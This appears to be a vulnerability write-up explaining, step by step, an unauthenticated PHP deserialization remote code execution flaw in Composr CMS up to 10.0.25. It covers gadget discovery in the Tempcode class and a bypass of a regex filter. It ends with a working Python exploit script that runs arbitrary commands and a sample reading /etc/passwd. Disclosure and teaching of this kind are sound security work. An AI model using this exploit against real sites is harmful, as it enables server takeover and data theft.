Composr CMS Remote Code Execution

Composr CMS suffers from a remote code execution vulnerability that can be triggered without authentication. The vulnerability arises because of insufficient validation of user-supplied data that is passed to unserialize in /sources/ajax.php. Versions up to and including 10.0.25 are vulnerable.

This document is supposed to be an informal writeup, explaining the full process of finding and exploiting the vulnerability including all failed attempts. It was written with the goal of giving an understanding of non-trivial deserialization exploits to people not acquainted with the details of PHP exploitation.

Finding dangerous functions

PHP exploitation relies heavily on "dangerous" functions. These are functions that can have unwanted side-effects if called with user-supplied data as arguments. The most well-known of these are eval, system and unserialize.

Finding dangerous functions is very easy, in the case of Composr CMS grepping for unserialize finds usage of it in several places. We should quickly make sure that these calls can be reached without authentication before going on to the next step.

Deserialization exploits

Now might be a good time to explain why unserialize is dangerous. serialize allows a programmer to take an (almost) arbitrary PHP value and turn it into a serialized string. For now it is unimportant how that string is built, we will look at the actual serialization mechanism later. This string can then for example be stored in a database or transmitted to a user. When unserialize is later called on this string it will recreate the original PHP value. The following PHP code demonstrates this:

class User {
    public $name;
    public $id;

    function __construct($name, $id) {
        $this->name = $name;
        $this->id = $id;
    }
};

$value = [new User('Franz', 1), ['hello', 'world', 0]];
$serialized = serialize($value);
echo $serialized;
// a:2:{i:0;O:4:"User":2:{s:4:"name";s:5:"Franz";s:2:"id";i:1;}i:1;a:3:{i:0;s:5:"hello";i:1;s:5:"world";i:2;i:0;}}


// do something here


$unserialized = unserialize($serialized);
var_dump($unserialized);
/*
array(2) {
  [0]=>
  object(User)#2 (2) {
    ["name"]=>
    string(5) "Franz"
    ["id"]=>
    int(1)
  }
  [1]=>
  array(3) {
    [0]=>
    string(5) "hello"
    [1]=>
    string(5) "world"
    [2]=>
    int(0)
  }
}
*/

There are two big reasons why deserializing a user-supplied string is a bad idea:

Firstly, you don't have any control over the structure of the deserialized value. Code that uses unserialize often assumes that the return value has some kind of structure. For example code might assume that the deserialized value is an array of integers. Of course, when deserializing a string chosen by an attacker this assumption can be violated. unserialize basically gives attackers the utmost control over not only the deserialized value but also over its type. As if that wasn't enough, unserialize also does something way more dangerous: It has the ability to instantiate objects of all classes that are in the current scope at the time of the unserialize call. PHP objects can have special "magic" methods. Magic methods are in most cases not called explicitly by the programmer, but implicitly by PHP itself. A quick overview of the most important magic methods:

method	called when
`__destruct`	object falls out of current scope
`__wakeup`	object is deserialized
`__sleep`	object is serialized
`__toString`	object is used in a context where PHP implicitly converts it into a string
`__invoke`	object is used as if it were a function

The following code shows how this can be exploited:

class Cache {
    public $file;
    public $data;

    function __construct($file) {
        $this->file = $file;
        $this->data = "";
    }

    function addData($data) {
        $this->data .= "\n" . $data;
    }

    function __destruct() {
        // quickly save the data!
        file_put_content($this->file, $this->data);
    }
}

$user = unserialize($_COOKIE['user']);

Attackers can exploit this code to write arbitrary data to an arbitrary file. They do this by serializing a Cache object with the file and data set to values of their choosing. This Cache object will then be instantiated when unserialize is called and its __destruct method will run after the script finished executing.

We can now look at Composr CMS again and see if we can find some classes with useful magic methods.

Finding useful magic methods

Modern PHP applications often feature many classes that have useful magic methods. PHPGGC is a project that contains a list of classes with interesting magic methods in wide-spread libraries. It also contains code to automatically generate exploit code.

Composr CMS however doesn't use any popular library so we have to find magic methods ourselves. Grepping for __destruct and __wakeup doesn't find anything useful. The Tempcode class in /sources/tempcode.php however has a very interesting __toString method:

class Tempcode {

    // ...

    public function __toString() {
        return $this->evaluate();
    }

    // ...

    public function evaluate($current_lang = null) {
        $tpl_funcs = $KEEP_TPL_FUNCS;
        foreach ($this->seq_parts as $seq_parts_group) {
            foreach ($seq_parts_group as $seq_part) {
                $seq_part_0 = $seq_part[0];

                if (!isset($tpl_funcs[$seq_part_0])) {
                    eval($this->code_to_preexecute[$seq_part_0]);
                }
            }
        }
    }

    // ...
}

This is a textbook unserialize gadget and it is super easy to use, too. Simply create a serialized Tempcode object in the following manner:

class Tempcode {

}

$tp = new Tempcode();
$tp->seq_parts = [[["somestring"]]];
$tp->code_to_preexecute["somestring"] = "system(\"ls\");exit();";
echo serialize($tp);
/*
O:8:"Tempcode":2:{s:9:"seq_parts";a:1:{i:0;a:1:{i:0;a:1:{i:0;s:10:"somestring";}}}s:18:"code_to_preexecute";a:1:{s:10:"somestring";s:20:"system("ls");exit();";}}
*/

If we can get Composr CMS to unserialize this string and the resulting object gets (unintentionally) used in a context where the __toString method will be called, we can achieve command execution.

A deeper look at Composr CMS

We will focus on the ajax_tree_script function in /sources/ajax.php. This function will run when you access http://example.org/data/ajax_tree.php. It is one of the functions that calls unserialize on user input without authentication. It starts by quickly checking if the site is in maintenance mode:

function ajax_tree_script()
{
    $site_closed = get_option('site_closed');
    if (($site_closed == '1') && (!has_privilege(get_member(), 'access_closed_site')) && (!$GLOBALS['IS_ACTUALLY_ADMIN'])) {
        header('Content-type: text/plain; charset=' . get_charset());
        @exit(get_option('closed'));
    }

Then sets some ajax stuff up:

    prepare_for_known_ajax_response();

    require_code('xml');
    header('Content-Type: text/xml');

Loads a hook object that will later run a few database queries and generate the response:

    $hook = filter_naughty_harsh(get_param_string('hook'));
    require_code('hooks/systems/ajax_tree/' . $hook, true);
    $object = object_factory('Hook_' . $hook, true);
    if ($object === null) {
        warn_exit(do_lang_tempcode('INTERNAL_ERROR'));
    }

Gets some further options and outputs the beginning of the response:

    $id = get_param_string('id', '', true);
    if ($id == '') {
        $id = null;
    }
    safe_ini_set('ocproducts.xss_detect', '0');
    $html_mask = get_param_integer('html_mask', 0) == 1;
    if (!$html_mask) {
        echo '<?xml version="1.0" encoding="' . get_charset() . '"?' . '>';
    }
    echo($html_mask ? '<html>' : '<request>');

Unserializes user-supplied data ($_GET['options'] in this case) and stores it in the $options variable:

    $_options = get_param_string('options', '', true);
    if ($_options == '') {
        $_options = serialize(array());
    }
    secure_serialized_data($_options); // Ignore this (for now)

    $options = @unserialize($_options);

    if ($options === false) {
        warn_exit(do_lang_tempcode('INTERNAL_ERROR'));
    }

And finally calls the run method on the loaded hook object and passes our unserialized input in:

    $val = $object->run($id, $options, get_param_string('default', null, true));
    echo str_replace('</body>', '<br id="ended" /></body>', $val);
    echo($html_mask ? '</html>' : '</request>');

    exit();
}

Reading the code we have control over which hook object is loaded (via the $_GET['hook'] parameter) and of course we have full control over the $options value. All of the hook objects we could use here work basically the same. We'll go with the Hook_choose_catalogue_entry class. Here is its run method:

    public function run($id, $options, $default = null)
    {
        require_code('catalogues');

        $only_owned = array_key_exists('only_owned', $options) ? (is_null($options['only_owned']) ? null : intval($options['only_owned'])) : null;
        $catalogue_name = array_key_exists('catalogue_name', $options) ? $options['catalogue_name'] : null;
        $editable_filter = array_key_exists('editable_filter', $options) ? ($options['editable_filter']) : false;
        $tree = get_catalogue_entries_tree($catalogue_name, $only_owned, is_null($id) ? null : intval($id), null, null, is_null($id) ? 0 : 1, $editable_filter);

        /* The rest from here on is unimportant */

This code assumes that $options is an array containing strings and integers. It tries to get a few values out of the array and passes them to a function called get_catalogue_entries_tree. This function will then execute a SQL query containing the $catalogue_name value thereby implicitly converting it to a string! This means that we found a way to get the script to call the __toString function on our serialized object! The only thing left to do is to build the exploit:

Building an exploit

The url we have to access is http://example.org/data/ajax_tree.php. To use the Hook_choose_catalogue_entry class we need to set the hook parameter to choose_catalogue_entry. Now we need to build the serialized options parameter. It should be an array that contains our Tempcode gadget. Let's fire up PHP to generate it:

class Tempcode {

}

$tp = new Tempcode();
$tp->seq_parts = [[["somestring"]]];
$tp->code_to_preexecute["somestring"] = "system(\"ls\");exit();";


$options = ['catalogue_name' => $tp];
echo serialize($options);
/*
a:1:{s:14:"catalogue_name";O:8:"Tempcode":2:{s:9:"seq_parts";a:1:{i:0;a:1:{i:0;a:1:{i:0;s:10:"somestring";}}}s:18:"code_to_preexecute";a:1:{s:10:"somestring";s:20:"system("ls");exit();";}}}
*/

Our exploit then looks like this:

#!/usr/bin/env python3
import requests

def exploit(base_url):
    payload = {'hook': 'choose_catalogue_entry',
               'options': 'a:1:{s:14:"catalogue_name";O:8:"Tempcode":2:{s:9:"seq_parts";a:1:{i:0;a:1:{i:0;a:1:{i:0;s:10:"somestring";}}}s:18:"code_to_preexecute";a:1:{s:10:"somestring";s:20:"system("ls");exit();";}}}'}
    return requests.get("{}/data/ajax_tree.php".format(base_url), params=payload)

exploit('http://example.org')

Let's execute it and have a look at the output:

$ python3 composr_exploit.py
<?xml version="1.0" encoding="utf-8"?><request>
<!DOCTYPE html>

<html lang="en" dir="ltr">
        <head>
...

Well, that doesn't look like ls at all...

Finding the problem

What we got back was a HTML document telling us that a PHP warning has been raised and that execution has been stopped. The error message says something about array_key_exists expecting an array and not getting one. The reason array_key_exists didn't get our deserialized array is because our serialized string has been tampered with! Directly before the call to unserialize another function is called. A function that (supposedly) checks the serialized string for dangerous objects: secure_serialized_data. It is defined in /sources/global3.php and we will soon take a look at what exactly it does. If you plan on exploiting deserialization vulnerabilities this is a situation you will probably find yourself in more than once. Don't worry, the serialization mechanism PHP uses is quite complicated and many of these handcrafted validation routines are easy to outsmart. To do this we should familiarize ourselves with the PHP serialization mechanism:

PHPs serialization mechanism

This is how basic types get serialized:

type	serialized	example
null	`N;`	`N;`
boolean	`b:<boolean as integer>;`	`b:1;`
integer	`i:<number>;`	`i:5;`
string	`s:<number of characters>:"<string>";`	`s:5:"hello";`
float	`d:<float>;`	`d:5.4;`

Note that if a string gets serialized it won't get escaped. So She said "hello" to me will get serialized to s:22:"She said "hello" to me";.

Now for the more complex types: Arrays get serialized to a:<number of elements>:{<list of elements>} where the <list of elements> is just a list of all serialized <key><element>-pairs. [0 => "a", 1 => "b", 2 => "c"] is therefore serialized to a:3:{i:0;s:1:"a";i:1;s:1:"b";i:2;s:1:"c";}.

Finally objects get serialized to O:<number of characters in the class name>:"<class name>":<number of class members>:{<list of class members>} where <list of class members> is serialized just like array elements (except of course that the keys must be strings here). Here is an example:

class HelloWorld {
    public $a;
    public $b;
}

$hello = new HelloWorld();

$hello->a = "a";
$hello->b = 1;

echo serialize($hello);
// O:10:"HelloWorld":2:{s:1:"a";s:1:"a";s:1:"b";i:1;}

Now that we know about the basic structure of serialized strings we can take a look at the secure_serialization_data function that currently blocks our attempt to gain code execution.

The validation function

// Cleaned up so it's easier to read
function secure_serialized_data(&$serialized_data)
{
    $matches = array();
    $num_matches = preg_match_all('#(^|;)O:\d+:"([^"]+)"#', $serialized_data, $matches);
    for ($i = 0; $i < $num_matches; $i++) {

        $methods = get_class_methods($matches[2][$i]);

        foreach ($methods as $method) {
            if (preg_match('#^__.*$#', $method) != 0) {
                $serialized_data = serialize(null);
                return;
            }
        }
    }
}

This function takes our serialized string and uses a regex to search for the occurence of O:<some number here>:"<class name>". It then takes whatever string was at <class name> and calls get_class_methods on it, iterates over the class methods and if one of these methods is a magic method it substitutes our $serialized_data string with a completely safe replacement.

Bypassing the validation function

It turns out that PHPs serialization language is context-sensitive (you could actually argue that it's a type-0 grammar) and regex can only parse regular languages. This means that there have to be cases where the regex and PHPs unserialize disagree on how to understand the input. These disagreements are called parser differentials. Our goal now is to find an input that exploits a parser differential in order to bypass the regex check.

The lame way that used to work

unserialize used to allow an superfluous + in some places:

O:+10:"HelloWorld":2:{s:1:"a";s:1:"a";s:1:"b";i:1;}
  ^

This makes it possible to completely bypass secure_serialized_data. It has one drawback though: It doesn't work for PHP 7.2 anymore.

The cool LangSec way that almost works

Well, we can serialize arbitrary strings. Having a little fun with that poor regex is almost obligatory:

class HelloWorld {

}

$serialized_data = serialize([";O:2:" => new HelloWorld()]);
echo $serialized_data;
// a:1:{s:5:";O:2:";O:10:"HelloWorld":0:{}};
//           ^           ^
// match   begin        end
//
// And since subsequent matches are continued from
// the end of the last match no further match is found

$matches = array();
$num_matches = preg_match_all('#(^|;)O:\d+:"([^"]+)"#', $serialized_data, $matches);
for ($i = 0; $i < $num_matches; $i++) {
    echo $matches[2][$i];
}

The regex now parses ;O:10: as the class name of an object and more importantly it doesn't find our HelloWorld object anymore! This is a classic parser differential that arises because regular languages are just not powerful enough to parse strings serialized with PHPs serialization mechanism. Sadly, it's of no use to us, because secure_serialized_data will go on to call get_class_methods on ;O:10: which will return null. And the following code then tries to iterate over null raising a warning and halting the execution. The thing stopping us here is the (admittedly good) security practice of stopping the execution on PHP warnings.

The moderately cool way that works!

Now, we want this to work for PHP 7.2 and we're kinda getting desperate. Luckily, it turns out that the serialization format has some features we haven't talked about yet:

Objects that implement the Serializable interface
References

Objects that implement the Serializable interface contain two methods serialize and unserialize. When serializing such an object a string of the following format will be returned: C:<number of characters in the class name>:"<class name>":<length of the output of the serialize method>:{<output of the serialize method>}. Creating a serialized string in this format for an object of a class that doesn't implement Serializable will work but the deserialized object will not have any class members set. It is thus not very useful for our purposes but it does lead the way to a final working exploit:

There are a few PHP classes implementing Serializable, the most important of which (for our purposes here) is SplDoublyLinkedList. This is the important part of the C code that handles serialization for SplDoublyLinkedList:

    /* flags */
    ZVAL_LONG(&flags, intern->flags);
    php_var_serialize(&buf, &flags, &var_hash);

    /* elements */
    while (current) {
        smart_str_appendc(&buf, ':');
        next = current->next;

        php_var_serialize(&buf, &current->data, &var_hash);

        current = next;
    }

It shows that the elements of a SplDoublyLinkedList are serialized just like serialize would serialize them but they are separated by colons. This provides us with a way to bypass the regex:

class HelloWorld {

}

$dll = new SplDoublyLinkedList();
$dll->push(new HelloWorld());
$dll->push(42);

$serialized_data = serialize($dll);
echo $serialized_data;
// C:19:"SplDoublyLinkedList":33:{i:0;:O:10:"HelloWorld":0:{}:i:42;}
//                                    ^
//                    This prevents the regex from matching

Now this by itself isn't really helpful. SplDoublyLinkedList doesn't implement __toString and although array operators work on it keys have to be numeric so $dll['catalogue_name'] doesn't work either. We can now get our gadget deserialized without triggering secure_serialized_data but we need a new way to call __toString on it.

There is one last thing about the serialization format we haven't talked about: It allows references. If you serialize the same object (not just a copy) twice, the object won't be serialized two times. Instead serialize will just store a reference. Here's a quick example:

class HelloWorld {

}

$a = new HelloWorld();

$serialized_data = serialize([$a, $a]);
echo $serialized_data;
// a:2:{i:0;O:10:"HelloWorld":0:{}i:1;r:2;}
//                                    ^
//                           This is the reference

We can now use this to build a new exploit that bypasses secure_serialized_data but still executes our code:

class Tempcode {

}

$tp = new Tempcode();
$tp->seq_parts = [[["somestring"]]];
$tp->code_to_preexecute["somestring"] = "system(\"ls\");exit();";

$dll = new SplDoublyLinkedList();
$dll->push($tp);

$options = [0 => $dll, 'catalogue_name' => $tp];
echo serialize($options);
/*
a:2:{i:0;C:19:"SplDoublyLinkedList":166:{i:0;:O:8:"Tempcode":2:{s:9:"seq_parts";a:1:{i:0;a:1:{i:0;a:1:{i:0;s:10:"somestring";}}}s:18:"code_to_preexecute";a:1:{s:10:"somestring";s:20:"system("ls");exit();";}}}s:14:"catalogue_name";r:4;}
*/

This exploit uses a bit of trickery: The malicious TempCode object is stored in the SplDoublyLinkedList to evade detection by the regex, but a reference to this TempCode object is used outside of the SplDoublyLinkedList, allowing us to use the discovered vulnerability where __toString is called on the array element with the key catalogue_name!

The final exploit

Here is the final exploit:

#!/usr/bin/env python3
import requests
import argparse

def exploit(base_url, cmd):
    payload = {'hook': 'choose_catalogue_entry', 'cmd': cmd, 'options': 'a:2:{i:0;C:19:"SplDoublyLinkedList":152:{i:0;:O:8:"Tempcode":2:{s:9:"seq_parts";a:1:{i:0;a:1:{i:0;a:1:{i:0;s:0:"";}}}s:18:"code_to_preexecute";a:1:{s:0:"";s:28:"system($_GET["cmd"]);exit();";}}}s:14:"catalogue_name";r:4;}'}
    return requests.get("{}/data/ajax_tree.php".format(base_url), params=payload).text[47:]

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Remote code execution on composr cms')
    parser.add_argument('url', help='base url of the composr installation')
    parser.add_argument('cmd', help='command to execute')

    args = parser.parse_args()

    print(exploit(args.url, args.cmd))

And one final test:

$ python3 composr_exploit.py http://localhost "cat /etc/passwd"
root:x:0:0:root:/root:/bin/bash
...

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

composr.md

composr.md

Composr CMS Remote Code Execution

Finding dangerous functions

Deserialization exploits

Finding useful magic methods

A deeper look at Composr CMS

Building an exploit

Finding the problem

PHPs serialization mechanism

The validation function

Bypassing the validation function

The lame way that used to work

The cool LangSec way that almost works

The moderately cool way that works!

The final exploit

Files

composr.md

Latest commit

History

composr.md

File metadata and controls

Composr CMS Remote Code Execution

Finding dangerous functions

Deserialization exploits

Finding useful magic methods

A deeper look at Composr CMS

Building an exploit

Finding the problem

PHPs serialization mechanism

The validation function

Bypassing the validation function

The lame way that used to work

The cool LangSec way that almost works

The moderately cool way that works!

The final exploit